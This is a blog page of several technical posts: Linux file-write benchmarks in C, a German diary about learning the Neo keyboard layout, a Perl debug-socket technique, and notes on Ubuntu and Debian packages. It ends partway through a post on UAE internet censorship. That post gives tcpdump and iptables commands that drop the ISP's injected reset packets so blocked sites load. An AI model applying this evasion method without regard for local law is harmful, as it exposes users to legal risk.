Julius Plenz

So you want to write to a file real fast…

Or: A tale about Linux file write patterns.

So I once wrote a custom core dump handler to be used with Linux’s core_pattern. What it does is take a core dump on STDIN plus a few arguments, and then write the core to a predictable location on disk with a time stamp and suitable access rights. Core dumps tend to be rather large, and in general you don’t know in advance how much data you’ll write to disk. So I built a functionality to write a chunk of data to disk (say, 16MB) and then check with fstatfs() if the disk has still more than threshold capacity (say, 10GB). This way, a rapidly restarting and core-dumping application cannot lead to “disk full” follow up failures that will inevitably lead to a denial of service for most data handling services.

So… how do we write a lot of data to disk really fast? – Let us maybe rephrase the question: How do we write data to disk in the first place? Let’s assume we have already opened file descriptors in and out, and we just want to copy everything from in to out.

One might be tempted to try something like this:

ssize_t read_write(int in, int out)
{
    ssize_t n, t = 0;
    char buf[1024];
    while((n = read(in, buf, 1024)) > 0) {
        t += write(out, buf, n);
    }
    return t;
}

“But…!”, you cry out, “there’s so much wrong with this!” And you are right, of course:

The return value n is not checked. It might be -1. This might be because e.g. we have got a bad file descriptor, or because the syscall was interrupted.
A call to write(out, buf, 1024) will – if it does not return -1 – write at least one byte, but we have no guarantee that we will actually write all n bytes to disk. So we have to loop the write until we have written n bytes.

An updated and semantically correct pattern reads like this (in a real program you’d have to do real error handling instead of assertions, of course):

ssize_t read_write_bs(int in, int out, ssize_t bs)
{
    ssize_t w = 0, r = 0, t, n, m;

    char *buf = malloc(bs);
    assert(buf != NULL);

    t = filesize(in);

    while(r < t && (n = read(in, buf, bs))) {
        if(n == -1) { assert(errno == EINTR); continue; }
        r = n;
        w = 0;
        while(w < r && (m = write(out, buf + w, (r - w)))) {
            if(m == -1) { assert(errno == EINTR); continue; }
            w += m;
        }
    }

    free(buf);

    return w;
}

We have a total number of bytes to read (t), the number of bytes already read (r), and the number of bytes already written (w). Only when t == r == w are we done (or if the input stream ends prematurely). Error checking is performed so that we restart interrupted syscalls and crash on real errors.

What about the bs parameter? Of course you may have already noticed in the first example that we always copied 1024 bytes. Typically, a block on the file system is 4KB, so we are only writing quarter blocks, which is likely bad for performance. So we’ll try different block sizes and compare the results.

We can find out the file system’s block size like this (as usual, real error handling left out):

ssize_t block_size(int fd)
{
    struct statfs st;
    assert(fstatfs(fd, &st) != -1);
    return (ssize_t) st.f_bsize;
}

OK, let’s do some benchmarks! (Full code is on GitHub.) For simplicity I’ll try things on my laptop computer with Ext3+dmcrypt and an SSD. This is “read a 128MB file and write it out”, repeated for different block sizes, timing each version three times and printing the best time in the first column. In parantheses you’ll see the percentage increase in comparison to the best run of all methods:

read+write 16bs             164ms      191ms      206ms
read+write 256bs            167ms      168ms      187ms  (+ 1.8%)
read+write 4bs              169ms      169ms      177ms  (+ 3.0%)
read+write bs               184ms      191ms      200ms  (+ 12.2%)
read+write 1k               299ms      317ms      329ms  (+ 82.3%)

Mh. Seems like multiples of the FS’s block sizes don’t really matter here. In some runs, the 16x blocksize is best, sometimes it’s the 256x. The only obvious point is that writing only a single block at once is bad, and writing fractions of a block at once is very bad indeed performance-wise.

Now what’s there to improve? “Surely it’s the overhead of using read() to get data,” I hear you saying, “Use mmap() for that!” So we come up with this:

ssize_t mmap_write(int in, int out)
{
    ssize_t w = 0, n;
    size_t len;
    char *p;

    len = filesize(in);
    p = mmap(NULL, len, PROT_READ, MAP_SHARED, in, 0);
    assert(p != NULL);

    while(w < len && (n = write(out, p + w, (len - w)))) {
        if(n == -1) { assert(errno == EINTR); continue; }
        w += n;
    }

    munmap(p, len);

    return w;
}

Admittedly, the pattern is simpler. But, alas, it is even a little bit slower! (YMMV)

read+write 16bs               167ms      171ms      209ms
mmap+write                    186ms      187ms      211ms  (+ 11.4%)

“Surely copying around useless data is hurting performance,” I hear you say, “it’s 2014, use zero-copy already!” – OK. So basically there are two approaches for this on Linux: One cumbersome but rather old and known to work, and then there is the new and shiny sendfile interface.

For the splice approach, since either reader or writer of your splice call must be pipes (and in our case both are regular files), we need to create a pipe solely for the purpose of splicing data from in to the write end of the pipe, and then again splicing that same chunk from the read end to the out fd:

ssize_t pipe_splice(int in, int out)
{
    size_t bs = 65536;
    ssize_t w = 0, r = 0, t, n, m;
    int pipefd[2];
    int flags = SPLICE_F_MOVE | SPLICE_F_MORE;

    assert(pipe(pipefd) != -1);

    t = filesize(in);

    while(r < t && (n = splice(in, NULL, pipefd[1], NULL, bs, flags))) {
        if(n == -1) { assert(errno == EINTR); continue; }
        r += n;
        while(w < r && (m = splice(pipefd[0], NULL, out, NULL, bs, flags))) {
            if(m == -1) { assert(errno == EINTR); continue; }
            w += m;
        }
    }

    close(pipefd[0]);
    close(pipefd[1]);

    return w;
}

“This is not true zero copy!”, I hear you cry, and it’s true, the ‘page stealing’ mechanism has been discontinued as of 2007. So what we get is an “in-kernel memory copy”, but at least the file contents don’t cross the kernel/userspace boundary twice unnecessarily (we don’t inspect it anyway, right?).

The sendfile() approach is more immediate and clean:

ssize_t do_sendfile(int in, int out)
{
    ssize_t t = filesize(in);
    off_t ofs = 0;

    while(ofs < t) {
        if(sendfile(out, in, &ofs, t - ofs) == -1) {
            assert(errno == EINTR);
            continue;
        }
    }

    return t;
}

So… do we get an actual performance gain?

sendfile                    159ms      168ms      175ms
pipe+splice                 161ms      162ms      163ms  (+ 1.3%)
read+write 16bs             164ms      165ms      178ms  (+ 3.1%)

“Yes! I knew it!” you say. But I’m lying here. Every time I execute the benchmark, another different approach is the fastest. Sometimes the read/write approach comes in first before the two others. So it seems that this is not really a performance saver, is it? I like the sendfile() semantics, though. But beware:

In Linux kernels before 2.6.33, out_fd must refer to a socket. Since Linux 2.6.33 it can be any file. If it is a regular file, then sendfile() changes the file offset appropriately.

Strangely, sendfile() works on regular files in the default Debian Squeeze Kernel (2.6.32-5) without problems. (Update 2015-01-17: Przemysław Pawełczyk, who in 2011 sent Changli Gao’s patch which re-enables this behaviour to stable@kernel.org for inclusion in Linux 2.6.32, wrote to me explaining how exactly it ended up being backported. If you’re interested, see this excerpt from his email.)

“But,” I hear you saying, “the system has no clue what your intentions are, give it a few hints!” and you are probably right, that shouldn’t hurt:

void advice(int in, int out)
{
    ssize_t t = filesize(in);
    posix_fadvise(in, 0, t, POSIX_FADV_WILLNEED);
    posix_fadvise(in, 0, t, POSIX_FADV_SEQUENTIAL);
}

But since the file is very probably fully cached, the performance is not improved significantly. “BUT you should supply a hint on how much you will write, too!” – And you are right. And this is where the story branches off into two cases: Old and new file systems.

I’ll just tell the kernel that I want to write t bytes to disk now, and please reserve space (I don’t care about a “disk full” that I could catch and act on):

void do_falloc(int in, int out)
{
    ssize_t t = filesize(in);
    posix_fallocate(out, 0, t);
}

I’m using my workstation’s SSD with XFS now (not my laptop any more). Suddenly everything is much faster, so I’ll simply run the benchmarks on a 512MB file so that it actually takes time:

sendfile + advices + falloc            205ms      208ms      208ms
pipe+splice + advices + falloc         207ms      209ms      210ms  (+ 1.0%)
sendfile                               226ms      226ms      229ms  (+ 10.2%)
pipe+splice                            227ms      227ms      231ms  (+ 10.7%)
read+write 16bs + advices + falloc     235ms      240ms      240ms  (+ 14.6%)
read+write 16bs                        258ms      259ms      263ms  (+ 25.9%)

Wow, so this posix_fallocate() thing is a real improvement! It seems reasonable enough, of course: Already the file system can prepare an – if possible contiguous – sequence of blocks in the requested size. But wait! What about Ext3? Back to the laptop:

sendfile                               161ms      171ms      194ms
read+write 16bs                        164ms      174ms      189ms  (+ 1.9%)
pipe+splice                            167ms      170ms      178ms  (+ 3.7%)
read+write 16bs + advices + falloc     224ms      229ms      229ms  (+ 39.1%)
pipe+splice + advices + falloc         229ms      239ms      241ms  (+ 42.2%)
sendfile + advices + falloc            232ms      235ms      249ms  (+ 44.1%)

Bummer. That was unexpected. Why is that? Let’s check strace while we execute this program:

fallocate(1, 0, 0, 134217728)           = -1 EOPNOTSUPP (Operation not supported)
...
pwrite(1, "\0", 1, 4095)                = 1
pwrite(1, "\0", 1, 8191)                = 1
pwrite(1, "\0", 1, 12287)               = 1
pwrite(1, "\0", 1, 16383)               = 1
...

What? Who does this? – Glibc does this! It sees the syscall fail and re-creates the semantics by hand. (Beware, Glibc code follows. Safe to skip if you want to keep your sanity.)

/* Reserve storage for the data of the file associated with FD.  */
int
posix_fallocate (int fd, __off_t offset, __off_t len)
{
#ifdef __NR_fallocate
# ifndef __ASSUME_FALLOCATE
  if (__glibc_likely (__have_fallocate >= 0))
# endif
    {
      INTERNAL_SYSCALL_DECL (err);
      int res = INTERNAL_SYSCALL (fallocate, err, 6, fd, 0,
                                  __LONG_LONG_PAIR (offset >> 31, offset),
                                  __LONG_LONG_PAIR (len >> 31, len));

      if (! INTERNAL_SYSCALL_ERROR_P (res, err))
        return 0;

# ifndef __ASSUME_FALLOCATE
      if (__glibc_unlikely (INTERNAL_SYSCALL_ERRNO (res, err) == ENOSYS))
        __have_fallocate = -1;
      else
# endif
        if (INTERNAL_SYSCALL_ERRNO (res, err) != EOPNOTSUPP)
          return INTERNAL_SYSCALL_ERRNO (res, err);
    }
#endif

  return internal_fallocate (fd, offset, len);
}

And you guessed it, internal_fallocate() just does a pwrite() on the first byte for every block until the space requirement is fulfilled. This is slowing things down considerably. This is bad. –

“But other people just truncate the file! I saw this!”, you interject, and again you are right.

void enlarge_truncate(int in, int out)
{
    ssize_t t = filesize(in);
    ftruncate(out, t);
}

Indeed the truncate versions work faster on Ext3:

pipe+splice + advices + trunc        157ms      158ms      160ms
read+write 16bs + advices + trunc    158ms      167ms      188ms  (+ 0.6%)
sendfile + advices + trunc           164ms      167ms      181ms  (+ 4.5%)
sendfile                             164ms      171ms      193ms  (+ 4.5%)
pipe+splice                          166ms      167ms      170ms  (+ 5.7%)
read+write 16bs                      178ms      185ms      185ms  (+ 13.4%)

Alas, not on XFS. There, the fallocate() system call is just more performant. (You can also use xfsctl directly for that.) –

And this is where the story ends.

In place of a sweeping conclusion, I’m a little bit disappointed that there seems to be no general semantics to say “I’ll write n bytes now, please be prepared”. Obviously, using posix_fallocate() on Ext3 hurts very much (this may be why cp is not employing it). So I guess the best solution is still something like this:

if(fallocate(out, 0, 0, len) == -1 && errno == EOPNOTSUPP)
    ftruncate(out, len);

Maybe you have another idea how to speed up the writing process? Then drop me an email, please.

Update 2014-05-03: Coming back after a couple of days’ vacation, I found the post was on HackerNews and generated some 23k hits here. I corrected the small mistake in example 2 (as pointed out in the comments – thanks!). – I trust that the diligent reader will have noticed that this is not a complete survey of either I/O hierarchy, file system and/or hard drive performace. It is, as the subtitle should have made clear, a “tale about Linux file write patterns”.

Update 2014-06-09: Sebastian pointed out an error in the mmap write pattern (the write should start at p + w, not at p). Also, the basic read/write pattern contained a subtle error. Tricky business – Thanks!

posted 2014-04-30 ∴ tagged linux and c

Der Umstieg zu Neo

Vor einem Jahr habe ich angefangen, mit dem Neo-Layout statt wie vorher mit dem US-QWERTY-Layout zu tippen. Von den für mich sehr hilfreichen Erfahrungsberichten von Umsteigern geleitet – in deren Liste ich mich hiermit auch einreihen will – habe ich während meines Umstiegs in den ersten Tagen recht regelmäßig Protokoll geführt.

Tag 1 (12.08.): Wow, ich fühle mich komplett hilflos vor meinem eigenen Rechner. Für jeden Satz, den ich tippen will, brauche ich eine Minute und mehr. Passwörter einzugeben ist der Horror. Jede Tastenkombination, die sonst einfach „drin“ ist, geht voll ins Leere, besonders in Vim bekomme ich gar nichts hin; ich spiele sogar ein paar Configs kaputt, weil ich unabsichtlich die alte Taste „k“ drücke, aber da liegt nun „r“ wie „replace“. Ich habe eine erste Mail geschrieben (aber auf Kiswahili, d.h. mit untypischen Buchstabenanordnungen) – alles ist so anstrengend!

Tag 2 (13.08.): Mit viel Müh und Not kann ich mittlerweile tmux und Vim rudimentär bedienen. Die Wörter tröpfeln mittlerweile vor sich hin, manche Trigramme kommen schon ganz flüssig raus. Wenn ich nicht am Computer sitze, tippe ich teilweise unbewusst in Gedanken Wörter vor mich hin; wird mir das bewusst, dann bemühe ich mich, in Neo zu denken. In der Theorie kann ich zumindest die ersten zwei Ebenen auswendig, muss aber teilweise noch mehrere Sekunden überlegen, bevor ich lostippen kann. Für die dritte Ebene blende ich bei Bedarf den NeoLayoutViewer ein. Ab und zu bricht meine Konzentration plötzlich ein und ich tippe fünf Mal nacheinander auf die gleiche falsche Taste, bis ich mich zusammenreiße und nachdenke. – Alles in allem ist es sehr, wie eine neue Sprache zu lernen…

Tag 3 (14.08.): Alles geht ein bisschen besser und flotter. Nichts geht wirklich fehlerfrei. Heute habe ich bachelorarbeitsbedingt qualvoll langsam getext, und ich muss sagen: Den wirklichen Vorteil sehe ich da nicht – auf einer US-Belegung sind die wichtigen Sonderzeichen mindestens genau so gut zu erreichen… (Aktuelle Geschwindigkeit: 63 Tasten pro Minute.)

Tag 4 (15.08.): Horror: sieben Stunden bei der Arbeit, und ich bekomme nichts hin, alles dauert ewig. Keine Lust, mehr zu schreiben.

Tag 5 (16.08.): Noch ein Tag Arbeit. Irgendwie geht alles, aber gefühlt konnte ich vor zwei Tagen noch sicherer und schneller tippen…

Tag 9 (21.08.): Nachdem ich das Wochenende über nicht viel vorm Rechner saß, musste ich mich zu Beginn der Woche doch mal wieder an die Bachelorarbeit setzen. Mittlerweile bin ich nicht mehr so ganz gefrustet, und manche (selbst lange) Wörter schreiben sich schon wirklich flüssig. Das wird schon. (Mittlerweile ca. 120 KPM.)

Tag 14 (26.08.): Stichtag: Bis heute hatte ich mir Zeit gegeben, um zu entscheiden, ob ich weiter Neo tippen will. Ich würde das Experiment nicht als „gescheitert“ ansehen, aber ich bin mit 140 Tasten pro Minute noch weit hinter dem, was ich mit QWERTY geschafft habe. Diverse Di- und Trigramme kommen mittlerweile sehr flüssig – aber ich habe das Gefühl, dass ich doch irgendwie jedes Wort ein paar Mal tippen muss, bis ich es wirklich kann. Morgen wird es ernst, denn da veranstalte ich eine Schulung und muss zwei Tage lang am Beamer tippen…

Tag 104 (23.11.): Das Muscle Memory ist schon lange da: Ich kann mich nicht mehr erinnern, wo die Tasten vorher lagen, ganz natürlich finden meine Finger Tag für Tag ihren Weg. Ich vertippe mich gefühlt selten, aber meine Schreibgeschwindigkeit ist mit ca. 330 Anschlägen pro Minute noch immer erst bei ca. 2/3 meiner Geschwindigkeit von vor dem Umstieg.

Was ich schon früh zu schätzen gelernt habe ist die Mod4-Taste, die die vierte Ebene aktiviert: Hier kann man ohne umzugreifen mit den Cursor-Tasten navigieren, an den Anfang und das Ende der Zeile springen sowie Zeichen löschen. Das nutze ich sehr häufig auch in Vim im Insert-Mode, was ja normalerweise nicht als „die reine Lehre“ angesehen wird: Mit NEO muss man aber nicht umgreifen und die Homerow verlassen, so dass es viel schneller als ein zweifacher Mode-Wechsel ist. – Überhaupt Vim: Ich hätte nie gedacht – und das war auch der einzige Grund, warum ich nicht schon mal früher Dvorak gelernt habe – dass man Vim auch mit komplett umgestellten Tasten bedienen kann. Ich navigiere selbst häufig mit hjkl, auch wenn die Buchstaben denkbar merkwürdig dafür angeordnet sind. Man gewöhnt sich an alles. :-)

Tag 372 (19.08.): Vor ziemlich genau einem Jahr bin ich umgestiegen – und mittlerweile habe ich meine alte Tipp-Geschwindigkeit von knapp 470 Tasten pro Minute wieder erreicht. Das scheint nicht wirklich ein Fortschritt zu sein – zumindest auf den ersten Blick. Allerdings glaube ich, dass ich insgesamt schneller, besser und ergonomischer tippe: ich schaue nie mehr auf die Tastatur, ich muss für Pfeiltasten, Backspace, Escape und ähnliche Sequenzen Dank der Mod4-Taste meine Finger nur minimal bewegen. Insgesamt bin ich also ziemlich zufrieden mit meinem Umstieg.

Ein paar Anmerkungen zum Lernen:

Wie schon vielfach bemerkt ist es am einfachsten, einfach „reinzuspringen“ und nur noch Neo zu tippen. Ja, die ersten Tage ist es anstrengend: Aber ziemlich schnell verlässt man diesen Zwischenzustand, und hängt nicht ewig im Limbo der Zwei Systeme. (Das ist der gleiche Effekt, wie wenn man eine neue Sprache im eigenen Land aus einem Buch lernt im Gegensatz dazu, einfach vor Ort zu sprechen.)
Es ist sinnvoll, den NeoLayoutViewer oder einen Ausdruck des Layouts parat zu haben, vor allem in den ersten Tagen. Gerade bei der Passworteingabe hat man kein visuelles Feedback!
Keine Tasten bekleben! Nicht auf die Tastatur schauen! Am besten auch eine neue Tastatur kaufen – doppelte Umgewöhnung fällt leichter – oder zumindest eine verwenden, die für’s Blindschreiben gemacht ist. (Ich habe auch schon vorher Das Keyboard verwendet.)

Ein paar technische Bemerkungen zum Neo-Layout:

Es ist meines Erachtens sehr gut gelöst, dass Zeichen, die in verschiedenen Kontexten verschiedene Bedeutungen haben, auch auf verschiedene Weisen getippt werden können. So tippe ich zum Beispiel ein Dollar-Zeichen beim Programmieren mit Mod3+ö, das heißt auf der Sonderzeichenebene. Aber wenn es um Währungsbeträge geht, halte ich mich an Shift+6, was neben dem Euro-Zeichen liegt. Auch den Bindestrich tippe ich meist über Mod3+d anstatt den in der Zahlenreihe zu verwenden.
Ich tippe Neo nur auf US-Tastaturen. Das ist anfangs ziemlich ungewöhnlich und fehlerträchtig, da die rechte Mod3-Taste für Sonderzeichen direkt über der Enter-Taste liegt. Gerade im IRC habe ich daher anfangs häufiger unfertige Nachrichten aus Versehen abgeschickt. Auf einer deutschen Tastatur ist das allerdings auch nicht unproblematisch. – Außerdem fehlt eine linke Mod4-Taste, so dass ich den „Ziffernblock“ auf der Ebene bisher nicht verwendet habe.
Für die Ebenen 5 und 6 mit griechischen Symbolen habe ich bisher noch keine Verwendung gefunden. Falls ich sie an LaTeX brauche, tippe ich immer noch den vollen Namen, also z.B. \alpha.

Ich möchte abschließend noch eine etwas philosophische Dimension dieses Umstieges thematisieren. Der Satz »Der Mensch gewöhnt sich an Alles« ist tiefgehender, als man denken könnte. Mir ist es innerhalb von wenigen Wochen gelungen, eine meiner zentralen Tätigkeiten komplett anders auszuüben. Dass das am Anfang frustrierend ist – und diese Notizen haben mich jetzt noch einmal ziemlich klar daran erinnern lassen, wie genervt ich war – ist natürlich zu erwarten. Aber wo ein Wille ist, ist auch ein Weg.

Genau wie die Anordnung der Buchstaben auf der Tastatur ziemlich arbiträr ist, und man von einer Anordnung auf die andere wechseln kann, weil keine der beiden eine inhärente „Wahrheit“ über Buchstaben und sprachliche Sätze enthält – genau so kann man auch Sprachen, Grammatiken, Denksysteme wechseln. Ich zum Beispiel sehe nun die Buchstaben K und H als ziemlich ähnlich an, weil ich sie mit dem gleichen Finger tippe und mich oft vertippt habe. Andere Leute können das vermutlich nicht nachvollziehen, und objektiv betrachtet ist mein Ähnlichkeitsgefühl auch absurd. Und doch lassen sich Effekte von Sprachverarbeitung auf die Realitätswahrnehmung feststellen.

Ich bin der Meinung, dass genau dieses Umwerfen gewisser fest geglaubter, aber tatsächlich arbiträrer Grundsätze ganz wichtig dafür ist, geistig nicht so schnell zu altern. Ein paar Ideen:

Lies Bücher aus Kulturen, in denen andere moralische Grundregeln und Kommunikationsformen als die der deinigen Welt dominieren.
Lerne eine Sprache, die keine Kategorisierung von Substantiven nach Geschlecht kennt.
Gehe einen anderen Weg als den bekannten (physisch oder im Übertragenen Sinne).
Benutze eine komplett neue Programmiersprache für ein kleines Nebenprojekt.
Versuche, komplexe Gedanken nur mit den 1.000 meistgenutzten Wörtern auszudrücken (Hilfe).
Benutze eine nicht eurozentrische Karte, auf der Süden nach oben zeigt (Gedanken dazu).

Oder, mit den Worten des Aphorismus Nr. 552 aus Nietzsches Menschliches, Allzumenschliches I, betitelt Das einzige Menschenrecht:

Wer vom Herkömmlichen abweicht, ist das Opfer des Außergewöhnlichen; wer im Herkömmlichen bleibt, ist der Sklave desselben. Zu Grunde gerichtet wird man auf jeden Fall.

posted 2013-08-19 ∴ tagged neo, linux and life

An on demand Debugging Technique for long-running Processes

Debbuging long-running processes or server software is usually an “either–or”: Either you activate debugging and have huge files that you rarely if ever look at, and they take up a considerable amount of disk space – or you did not activate the debugging mode and thus cannot get to the debugging output to figure out what the program is doing right now.

There is a really nice quick and dirty Non-invasive printf debugging technique that just does a printf on a non-existent file descriptor, so that you can view the messages by strace-ing the process and grepping for EBADF.

I want to share here a few Perl code snippets for an approach that is a little neater IMO, yet a little bit more invasive. Consider a simple “server” doing some work, occasionally printing out a debug statement:

#!/usr/bin/perl

use strict;
use warnings;

sub Debug { }; # empty for now

while(1) {
    Debug("Here I am!");
    select undef, undef, undef, 0.1;
}

The idea is now to on demand create a UNIX domain socket where the process can write debug information to, so that (possibly a few) other processes can read and print out the debug info received on that socket.

We introduce a “global” structure $DEBUG, and a function to initialize and destroy the socket, which is named debug-<pid-of-process> and placed in /tmp.

my $DEBUG = {
    socket => undef,
    conn => [],
    last_check => 0,
};

sub Debug_Init {
    use IO::Socket;
    use Readonly;
    my Readonly $SOCKET = "/tmp/debug-$$";

    return if $DEBUG->{socket};

    unlink $SOCKET;
    my $s = IO::Socket::UNIX->new(
        Type => IO::Socket::SOCK_STREAM,
        Local => $SOCKET,
        Listen => 1,
    ) or die $!;
    $s->blocking(0);
    $DEBUG->{socket} = $s;
}

sub Debug_Cleanup {
    return unless $DEBUG->{socket};
    my $path = $DEBUG->{socket}->hostpath;
    undef $DEBUG->{socket};
    unlink $path;
}

When the process receives a SIGUSR1, we call Debug_Init, and to be sure we’ll clean up the socket in case of normal exit:

$SIG{USR1} = \&Debug_Init;
END { Debug_Cleanup; }

The socket is in non-blocking mode, so trying to accept() new connections will not block. Now, whenever we want to print out a debugging statement, we check if anyone has requested the debugging socket via SIGUSR1. After the first connection is accepted, we’ll only check once every second for new connections. For every accepted connection, we send the debugging message to that peer. (Note that UNIX domain sockets with Datagram type sadly do not support broadcast messaging – otherwise this would probably be easier.)

In case sending the message fails (probably because the peer disconnected), we’ll remove that connection from the list. If the last connection goes, we’ll unlink the socket.

sub Debug {
    return unless $DEBUG->{socket};
    my $s = $DEBUG->{socket};
    my $conn = $DEBUG->{conn};
    my $msg = shift or return;
    $msg .= "\n" unless $msg =~ /\n$/;

    if(time > $DEBUG->{last_check}) {
        while(my $c = $s->accept) {
            $c->shutdown(IO::Socket::SHUT_RD);
            push @$conn => $c;
        }
        $DEBUG->{last_check} = time if @$conn;
    }
    return unless @$conn;

    for(@$conn) {
        $_->send($msg, IO::Socket::MSG_NOSIGNAL) or undef $_;
    }
    @$conn = grep { defined } @$conn;

    unless(@$conn) {
        Debug_Cleanup();
    }
}

Here’s a simple script to display the debugging info for a given PID, assuming it uses the setup described above:

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $pid = shift;
if(not defined $pid) {
    print "usage: $0 <pid>\n";
    exit(1);
}

kill USR1 => $pid or die $!;

my $path = "/tmp/debug-$pid";
select undef, undef, undef, 0.01 until -e $path;

my $s = IO::Socket::UNIX->new(
    Type => IO::Socket::SOCK_STREAM,
    Peer => $path,
) or die $!;
$s->shutdown(IO::Socket::SHUT_WR);

$| = 1;
while($s->recv(my $m, 4096)) {
    print $m;
}

We can now start the server; no debugging happens. But as soon as we send a SIGUSR1 and attach to the (now present) debug socket, we can see the debug information:

$ perl server & ; sleep 10
[1] 19731

$ perl debug-process 19731
Here I am!
Here I am!
Here I am!
^C

When we hit Ctrl-C, the debug socket vanishes again.

In my opinion this is a really neat way to have a debugging infrastructure in place “just in case”.

posted 2013-07-13 ∴ tagged linux and perl

So your favourite game segfaults

I’m at home fixing some things one my mother’s new laptop, including upgrading to the latest Ubuntu. (Usually that’s a bad idea, but in this case it came with an update to LibreOffice which repaired the hang it previously encountered when opening any RTF file. Which was a somewhat urgent matter to solve.)

But, alas, one of the games (five-or-more, formerly glines) broke and now segfaults on startup. Happens to be the one game that she likes to play every day. What to do? The binary packages linked here don’t work.

Here’s how to roll your own: Get the essential development libraries and the ones specifically required for five-or-more, also the checkinstall tool.

apt-get install build-essential dpkg-dev checkinstall
apt-get build-dep five-or-more

Change to a temporary directory, get the source:

apt-get source five-or-more

Then apply the fix, configure and compile it:

./configure
make

But instead of doing a make install, simply use sudo checkinstall. This will build a pseudo Debian package, so that at least removing it will be easier in case an update will fix the issue.

How can this be difficult to fix?! *grr*

posted 2013-06-14 ∴ tagged linux, ubuntu and rant

“nocache” in Debian Testing

I’m very pleased to announce that a little program of mine called nocache has officially made it into the Debian distribution and migrated to Debian testing just a few days ago.

The tool started out as a small hack that employs mmap and mincore to check which blocks of a file are already in the Linux FS cache, and uses this info in the intercepted libc’s open/close syscall wrappers and related functions in an effort to restore the cache to its pristine state after every file access.

I only wrote this tool as a little “proof of concept”, but it seems there are people out there actually using this, which is nice.

A couple of links:

My thanks go out to Dmitry who packaged and will be maintaining the tool for Debian – as well as the other people who engaged in the lively discussions in the issue tracker.

Update: Chris promptly provided an Arch Linux package, too! Thanks!

posted 2013-05-19 ∴ tagged linux and debian

Internet Censorship in Dubai and the UAE

The internet is censored in the UAE. Not really bad like in China – it’s rather used to restrict access to “immoral content”. Because you know, the internet is full of porn and Danish people making fun of The Prophet. – Also, downloading Skype is forbidden (but using it is not).

I have investigated the censorship mechanism of one of the two big providers and will describe the techniques in use and how to effectively circumvent the block.

How it works

If you navigate to a “forbidden page” in the UAE, you’ll be presented with a screen warning you that it is illegal under the Internet Access Management Regulatory Policy to view that page.

This is actually implemented in a pretty rudimentary, yet effective way (if you have no clue how TCP/IP works). If a request to a forbidden resource is made, the connection is immediately shut down by the proxy. In the shutdown packet, an <iframe> code is placed that displays the image:

<iframe src="http://94.201.7.202:8080/webadmin/deny/index.php?dpid=20&
  dpruleid=7&cat=105&ttl=0&groupname=Du_Public_IP_Address&policyname=default&
  username=94.XX.0.0&userip=94.XX.XX.XX&connectionip=1.0.0.127&
  nsphostname=YYYYYYYYYY.du.ae&protocol=nsef&dplanguage=-&url=http%3a%2f%2f
  pastehtml%2ecom%2fview%2fc336prjrl%2ertxt"
  width="100%" height="100%" frameborder=0></iframe>

Capturing the TCP packets while making a forbidden request – in this case: a list of banned URLs in the UAE, which itself is banned – reveals one crucial thing: The GET request actually reaches the web server, but before the answer arrives, the proxy has already sent the Reset-Connection-Packets. (Naturally, that is much faster, because it is physically closer.)

Because the client thinks the connection is closed, it will itself send out Reset-Packets to the Webserver in reply to its packets containing the reply (“the webpage”). This actually shuts down the connection in both directions. All of this happens on the TCP level, thus by “client” I mean the operating system. The client application just opens a TCP socket and sees it closed via the result code coming from the OS.

You can see the initial reset-packets from the proxy as entries 5 und 6 in the list; the later RST packets originate from my computer because the TCP stack considers the connection closed.

How to circumvent it

First, we need to find out at which point our HTTP connection is being hijacked. To do this, we search for the characteristic TCP packet with the FIN, PSH, ACK bits set, while making a request that is blocked. The output will be something like:

$ sudo tcpdump -v "tcp[13] = 0x019"
18:38:35.368715 IP (tos 0x0, ttl 57, ... proto TCP (6), length 522)
    host-88-80-29-58.cust.prq.se.http > 192.168.40.73.37630: Flags [FP.], ...

We are only interested in the TTL of the FIN-PSH-ACK packets: By substracting this from the default TTL of 64 (which the provider seems to be using), we get the number of hops the host is away. Looking at a traceroute we see that obviously, the host that is 64 - 57 = 7 hops away is located at the local ISP. (Never mind the un-routable 10.* appearing in the traceroute. Seeing this was the initial reason for me to think these guys are not too proficient in network technology, no offense.)

$ mtr --report --report-wide --report-cycles=1 pastehtml.com
HOST: mjanja                         Loss%   Snt   Last   Avg  Best  Wrst StDev
  1.|-- 192.168.40.1                  0.0%     1    2.9   2.9   2.9   2.9   0.0
  2.|-- 94.XX.XX.XX                   0.0%     1    2.9   2.9   2.9   2.9   0.0
  3.|-- 10.XXX.0.XX                   0.0%     1    2.9   2.9   2.9   2.9   0.0
  4.|-- 10.XXX.0.XX                   0.0%     1    2.9   2.9   2.9   2.9   0.0
  5.|-- 10.100.35.78                  0.0%     1    6.8   6.8   6.8   6.8   0.0
  6.|-- 94.201.0.2                    0.0%     1    7.7   7.7   7.7   7.7   0.0
  7.|-- 94.201.0.25                   0.0%     1    8.4   8.4   8.4   8.4   0.0
  8.|-- 195.229.27.85                 0.0%     1   11.1  11.1  11.1  11.1   0.0
  9.|-- csk012.emirates.net.ae        0.0%     1   27.3  27.3  27.3  27.3   0.0
 10.|-- 195.229.3.215                 0.0%     1  146.6 146.6 146.6 146.6   0.0
 11.|-- decix-ge-2-7.i2b.se           0.0%     1  156.2 156.2 156.2 156.2   0.0
 12.|-- sth-cty1-crdn-1-po1.i2b.se    0.0%     1  164.7 164.7 164.7 164.7   0.0
 13.|-- 178.16.212.57                 0.0%     1  151.6 151.6 151.6 151.6   0.0
 14.|-- cust-prq-nt.i2b.se            0.0%     1  157.5 157.5 157.5 157.5   0.0
 15.|-- tunnel3.prq.se                0.0%     1  161.5 161.5 161.5 161.5   0.0
 16.|-- host-88-80-29-58.cust.prq.se  0.0%     1  192.5 192.5 192.5 192.5   0.0

We now know that with a very high probability, all “connection termination” attempts from this close to us – relative to a TTL of 64, which is set by the sender – are the censorship proxy doing its work. So we simply ignore all packets with the RST or FIN flag set that come from port 80 too close to us:

for mask in FIN,PSH,ACK RST,ACK; do
    sudo iptables -I INPUT -p tcp --sport 80 \
       -m tcp --tcp-flags $mask $mask \
       -m ttl --ttl-gt 55 -m ttl --ttl-lt 64 \
       -j DROP;
done

NB: This checks for the TTL greater than, so we have to check for greater 56 and substract one to be one the safe side. You can also leave out the TTL part, but then “regular” TCP terminations remain unseen by the OS, which many programs will find weird (and sometimes data comes with a package that closes the connection, and this data would be lost).

That’s it. Since the first reply packet from the server is dropped, or rather replaced with the packet containing the <iframe> code, we rely on TCP retransmission, and sure enough, some 0.21 seconds later the same TCP packet is retransmitted, this time not harmed in any way:

The OS re-orders the packets and is able to assemble the TCP stream. Thus, by simply ignoring two packets the provider sends to us, we have an (almost perfectly) working TCP connection to where-ever we want.

Why like this?

